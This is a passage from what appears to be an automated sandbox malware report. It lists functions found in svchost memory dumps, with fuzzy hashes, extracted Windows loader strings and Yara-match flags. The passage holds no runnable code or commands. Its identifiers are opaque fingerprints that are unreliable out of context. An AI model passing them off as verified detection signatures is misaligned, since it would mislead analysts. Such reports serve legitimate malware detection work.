                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: kLsE
                                • API String ID: 3446177414-3058123920
                                • Opcode ID: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                • Instruction ID: c6828853ad4a863a26bf1e63059b071ed2fecf56155baf851f426090f482c5f6
                                • Opcode Fuzzy Hash: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                • Instruction Fuzzy Hash: 8A4187735013504AE731FF65E884B69BBA4AB30B24F190258FEA0CF2C9CBB09585D7A0
                                Function 03C452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-149943524
                                • Opcode ID: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                • Instruction ID: f0d83d79cfc8e0eb2c83ab1de05bf49b89b4d2a5a44e631d345cf3cb4450851f
                                • Opcode Fuzzy Hash: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                • Instruction Fuzzy Hash: A932A8755083118BDB24CF19C484B7EF7E1AF8A750F19492EF986DB290E734CA94CB92
                                Function 03CFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: `$`
                                • API String ID: 0-197956300
                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction ID: f859c663c0bb734eb4a3c39f6d9b6671c0174392a7544de40434cd290343a0fd
                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction Fuzzy Hash: D9C1DE352047429FDB64CF29C845B6BFBE5AF84318F084A2DFA99CA290D774D645CF81
                                Function 03C30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                Download Yara Rule
                                Strings
                                • Failed to retrieve service checksum., xrefs: 03C8EE56
                                • ResIdCount less than 2., xrefs: 03C8EEC9
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                • API String ID: 0-863616075
                                • Opcode ID: 35bf1ce05264805f17f0909b49087b0e955d176d0dfde634ee0cd99f6c6dc379
                                • Instruction ID: 177dd187b698b30c6446800f68f0309da3dd2a3a8374052c4b3070258f780ae6
                                • Opcode Fuzzy Hash: 35bf1ce05264805f17f0909b49087b0e955d176d0dfde634ee0cd99f6c6dc379
                                • Instruction Fuzzy Hash: 8EE1E2B59087849FE324CF15C440BABBBE4FB89315F448A2EE599CB380DB719609CF56
                                Function 004024A0 Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: gfff$gfff
                                • API String ID: 0-3084402119
                                • Opcode ID: 9e650593f37bcdb2803de8f1ef81d1aa098615cbc9780c8827e862b478435319
                                • Instruction ID: 12ddf8fba4eecbe2d766932efd3683eb12a3c6a6851bc0847fa7179fc9d03475
                                • Opcode Fuzzy Hash: 9e650593f37bcdb2803de8f1ef81d1aa098615cbc9780c8827e862b478435319
                                • Instruction Fuzzy Hash: 9A81D571B001098BDB1CCD5DCE5466AB3A6EBD8305F58817AED09EF3C1EA78ED118784
                                Function 03CAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Legacy$UEFI
                                • API String ID: 2994545307-634100481
                                • Opcode ID: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                • Instruction ID: 2fb2911126f5376dd9212d302047102411fd69b9a09ad4bae3dc3301d33cd93d
                                • Opcode Fuzzy Hash: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                • Instruction Fuzzy Hash: BC614C72E00B199FDB24DFBDC880BADBBB9FB44704F144069E559EB291D731A940DB90
                                Function 03C4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$$
                                • API String ID: 0-233714265
                                • Opcode ID: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
                                • Instruction ID: 6dc7c6dff11edded79869eb8bde08c034dfebceef0fe6be928d2d5b73bab5425
                                • Opcode Fuzzy Hash: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
                                • Instruction Fuzzy Hash: ED61B736A0074ADFDB20EFA4C584BADB7B2BF48308F09406DD515EF680CB74AA41DB90
                                Function 03C3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                Download Yara Rule
                                Strings
                                • RtlpResUltimateFallbackInfo Exit, xrefs: 03C3A309
                                • RtlpResUltimateFallbackInfo Enter, xrefs: 03C3A2FB
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                • API String ID: 0-2876891731
                                • Opcode ID: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                • Instruction ID: f6a0a4da448a6ff37b606432ae1ba803537d6f0524f44b2d67a2bb1cf0a2d55f
                                • Opcode Fuzzy Hash: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                • Instruction Fuzzy Hash: 4341CF78A04649DBDB11CF69C844B69B7F4FF86700F1944AAEC81DF2A1E735DA10CB41
                                Function 03C6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local\$@
                                • API String ID: 0-380025441
                                • Opcode ID: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                • Instruction ID: d19451b5720a3534b69165f500853dc81849b9f0a5ebd4d7acffef7f66427152
                                • Opcode Fuzzy Hash: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                • Instruction Fuzzy Hash: AD31B37A5083449FC310DF29C8C0A6BBBE8FBC5654F49092EF995C7260DA30DE05DB92
                                Function 03C3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: MUI
                                • API String ID: 0-1339004836
                                • Opcode ID: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                • Instruction ID: be00aaf97956b56916b1b5b7d97fe4a1571b43b83d24ab134b2731902e9abb81
                                • Opcode Fuzzy Hash: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                • Instruction Fuzzy Hash: EF824C75E002189BDB24CFA9C984BEDF7B5BF4A710F188169D85AEB250DB319E41CF50
                                Function 03C82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: P`vRbv
                                • API String ID: 0-2392986850
                                • Opcode ID: f849b347fc7dff7d1b9845de0d28806afb470cea834059b6b02d841b2ef43be9
                                • Instruction ID: 43bfe3ab7374075d124a78a173bce885670fe94b4cc2f55229a1b80659a2f7b6
                                • Opcode Fuzzy Hash: f849b347fc7dff7d1b9845de0d28806afb470cea834059b6b02d841b2ef43be9
                                • Instruction Fuzzy Hash: 8542E27DD04299AADF29FFA8D8446BDFBB0AF04B18F18905AD441EF280D7358B81CB54
                                Function 03C37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                • Instruction ID: 2d51b14a2c476683a68a3beda7dba8961bd2f3038d6c2c80109ac449adceef35
                                • Opcode Fuzzy Hash: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                • Instruction Fuzzy Hash: D9A16BB5608342CFD724DF29C480A2ABBE5BF89704F19496EE585DB350E730E945CF92
                                Function 03C52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 72a7eaf7cc8e56cc8ed2abe6e1ee436b0abd1d9a8e75c0bcbb22e99e38ff597e
                                • Instruction ID: 85e08dfcb1a0fc284eb2cb806008690ce3c7f91c9dddbf95a7eb22085ec416ea
                                • Opcode Fuzzy Hash: 72a7eaf7cc8e56cc8ed2abe6e1ee436b0abd1d9a8e75c0bcbb22e99e38ff597e
                                • Instruction Fuzzy Hash: F1F1B0796087819FDB25CF25C484B6BBBE5AFC8750F09486DFC89CB240CB34DA858B55
                                Function 00416A6D Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (
                                • API String ID: 0-3887548279
                                • Opcode ID: 56bbc6acf5947fa35b6e9147931690dbd2dc2779624dab41fe3631ca9c98fb3a
                                • Instruction ID: ad23a1c1f993c913bd1f01201675fbab6c0d98c7e32a400648b05e3bc3241f55
                                • Opcode Fuzzy Hash: 56bbc6acf5947fa35b6e9147931690dbd2dc2779624dab41fe3631ca9c98fb3a
                                • Instruction Fuzzy Hash: EB120BB6E006199FCB14CF99D8805DDBBF2FF88314F1AC1AAD809A7315D774AA418F84
                                Function 00416AAF Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (
                                • API String ID: 0-3887548279
                                • Opcode ID: 01c771fc0d98e2962932d4e39a6deec4c6b4008082489e98f09c25c0f53f9441
                                • Instruction ID: 09ca926781115b8750253b8d573087e8931d55daa4afa19032f729561aa91fb2
                                • Opcode Fuzzy Hash: 01c771fc0d98e2962932d4e39a6deec4c6b4008082489e98f09c25c0f53f9441
                                • Instruction Fuzzy Hash: 2E021F76E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7355D674AA418F80
                                Function 00416AB3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (
                                • API String ID: 0-3887548279
                                • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                • Instruction ID: a9eb9687149634e907a2b4a4e525b3f68584b66ffed4e777a6d308507ddcb704
                                • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                • Instruction Fuzzy Hash: 49021EB6E006189FDB54CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                Function 03C32FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: PATH
                                • API String ID: 0-1036084923
                                • Opcode ID: 782b45dc364bbbac17c1424fe324914e2c8a6010b78bbe36d1c4c3525d564296
                                • Instruction ID: f63a8d3011b777662e3d77c456c32564c3cfe19375716406d70bf68f99a1593e
                                • Opcode Fuzzy Hash: 782b45dc364bbbac17c1424fe324914e2c8a6010b78bbe36d1c4c3525d564296
                                • Instruction Fuzzy Hash: F6F1D37AD00258DBCB25DFA9D880ABEBBB1FF9A700F494029E841EB350D775E941CB51
                                Function 03C6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                • Instruction ID: 9e5445505445a6e9497ff835554e335669c171fff8a67fe58c9d5e37b1dc8e54
                                • Opcode Fuzzy Hash: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                • Instruction Fuzzy Hash: 6D4149B5D00288AFDB20DFA9D880AADFBF4FB58300F14416EE859EB211D7319A01DF60
                                Function 03C30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: fbaf9936e9123821a492d56ca45ed1a1daace3bde71f0748d9804f1b1800625c
                                • Instruction ID: 912b5104630a4608ee12ec42806349a05d3a2cf8080956f54a22822f56e8015b
                                • Opcode Fuzzy Hash: fbaf9936e9123821a492d56ca45ed1a1daace3bde71f0748d9804f1b1800625c
                                • Instruction Fuzzy Hash: 61A10B33A043786BDF64DB298840BFEA7A95F46308F0940D9ED87EF281CA759B44CB55
                                Function 00402820 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: gfff
                                • API String ID: 0-1553575800
                                • Opcode ID: fc34fda1d759ae678202fcc069febb0d4074acaa521a64fce68f0836d669d229
                                • Instruction ID: cc924f2754c3dde423c8d00f837340db0c3f140ad26b7932e16e7d873f707fc3
                                • Opcode Fuzzy Hash: fc34fda1d759ae678202fcc069febb0d4074acaa521a64fce68f0836d669d229
                                • Instruction Fuzzy Hash: F961D5B2B0001A47DF2C8D5DDE986AE7366E794315F18813EDC56EB3D0E6B89D118784
                                Function 03C6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalTags
                                • API String ID: 0-1106856819
                                • Opcode ID: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                • Instruction ID: 89f174274dab451a1fc6c813c47b92bd799d84f0eb91e9922cf15142aeef4ff4
                                • Opcode Fuzzy Hash: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                • Instruction Fuzzy Hash: 0C716D76E0071ADFDF28CF9DD5906ADBBB5BF48708F18816AE806EB240E7309951CB54
                                Function 03C3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction ID: f49e858e14be0f8fd7364af565b33b151c54cc059969ad305024a28233406e22
                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction Fuzzy Hash: 90618D76D00219ABDF21DF99C844BEEFBB8FF81710F16456AE810EB290D7709A01DB91
                                Function 03CBF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction ID: a799be4487b597a356811bf0ba8f747b44f04ad4c5533c96b073fa64e1a2fe85
                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction Fuzzy Hash: 24516672A04345AFD721DE54CC44FAAB7B8FB84750F05092DFA80DB290DBB5EA14CB92
                                Function 03CEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: PreferredUILanguages
                                • API String ID: 0-1884656846
                                • Opcode ID: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                • Instruction ID: 4b28760c5f2d574f4213d36b3fc4bf5ebb85770cd9caf03d0f8c2a51e9bf6f07
                                • Opcode Fuzzy Hash: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                • Instruction Fuzzy Hash: 6A41C476D04219ABCF11DA95C841BFEF7B9EF44750F050166E911EF254DAB4DE40C7A0
                                Function 03CAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: BinaryHash
                                • API String ID: 0-2202222882
                                • Opcode ID: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                • Instruction ID: 78e54c4b5aba878866798ae7a5e83c245f2b725816f6fa7ea74367d5daf8b567
                                • Opcode Fuzzy Hash: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                • Instruction Fuzzy Hash: 9B4165B6D0062DAADB21DB54CC84FDEB77CAB44718F0185E5EA08EB140DB709E889F94
                                Function 03CB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: verifier.dll
                                • API String ID: 0-3265496382
                                • Opcode ID: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                • Instruction ID: 1691e3386777735eecd9dd06246a70f5f48663393301029ff1bc56ce94eb5263
                                • Opcode Fuzzy Hash: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                • Instruction Fuzzy Hash: 11319376A003119FDB24DF69A850B76B7F6EF5A314F598079E608DF391E7328E808790
                                Function 03C636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Flst
                                • API String ID: 0-2374792617
                                • Opcode ID: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                • Instruction ID: befa988da6598c5e9ce8788fe5bc9880c0530d25e80c7e810e4ab6897dead9ef
                                • Opcode Fuzzy Hash: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                • Instruction Fuzzy Hash: B34198B56053019FC314CF19D2C0A16FBE4EF89714F18856EE44ACF291DB71DA42CB91
                                Function 03C35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx
                                • API String ID: 0-89312691
                                • Opcode ID: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                • Instruction ID: 51aa2605a9077e87c9f14c27988b2a49acaa07c69dc42279b2c9ebeb88ca2e48
                                • Opcode Fuzzy Hash: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                • Instruction Fuzzy Hash: 4C1182307096528BEB24C91E88546B6F2D9EB97264F3C852AE462CF391D673DD418780
                                Function 03CB106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrCreateEnclave
                                • API String ID: 0-3262589265
                                • Opcode ID: 5398c06d019a3f2df23f5f50ed1d8ea40cbff99cf8c36a5a127e35345d3f1474
                                • Instruction ID: cde1fbade332cebcdc891ea9eefd23b4d3d46529e9c3ff0df21ebe9a14a10d1f
                                • Opcode Fuzzy Hash: 5398c06d019a3f2df23f5f50ed1d8ea40cbff99cf8c36a5a127e35345d3f1474
                                • Instruction Fuzzy Hash: D82107B59183449FC320DF1AD844A9BFBE8FBE5B00F144A1EB5A0DB250D7B1D504DB92
                                Function 03C6E8F0 Relevance: 1.0, Instructions: 985COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f7c87b017e63eb1d37c46f99fb574e988fe9e4c6e26dd43fd6ea7f968834a65
                                • Instruction ID: 77e2d6e610ac0f751d21e36ed232b59c106f730ce7cbada229b736d6be9c1ad8
                                • Opcode Fuzzy Hash: 2f7c87b017e63eb1d37c46f99fb574e988fe9e4c6e26dd43fd6ea7f968834a65
                                • Instruction Fuzzy Hash: 23822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB345DA34AC568B45
                                Function 03C7516C Relevance: .8, Instructions: 785COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8951be3170c0f1d402c877f11a9390d45954068cf374fa42594c689c5ab8496
                                • Instruction ID: 621660b7852f931ecb883d1f6bb2267c3c783f2d6b5b3b6c9bc10abaac333aeb
                                • Opcode Fuzzy Hash: e8951be3170c0f1d402c877f11a9390d45954068cf374fa42594c689c5ab8496
                                • Instruction Fuzzy Hash: 54628D7690464AAFCF24CF18D4905AEFB62BA56314F49C69CCC9AEB604D731BA44CBD0
                                Function 03C8739A Relevance: .7, Instructions: 705COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                • Instruction ID: beb68af9dd1063871adc36d8ded1ce583a87e2c686d53affaa9ebc4275dd1edf
                                • Opcode Fuzzy Hash: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                • Instruction Fuzzy Hash: 4A429175A006168FDB15EF59C4806BEF7B6FF88318B28856DD552EB340E734EA42CB90
                                Function 03C85AA0 Relevance: .7, Instructions: 652COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
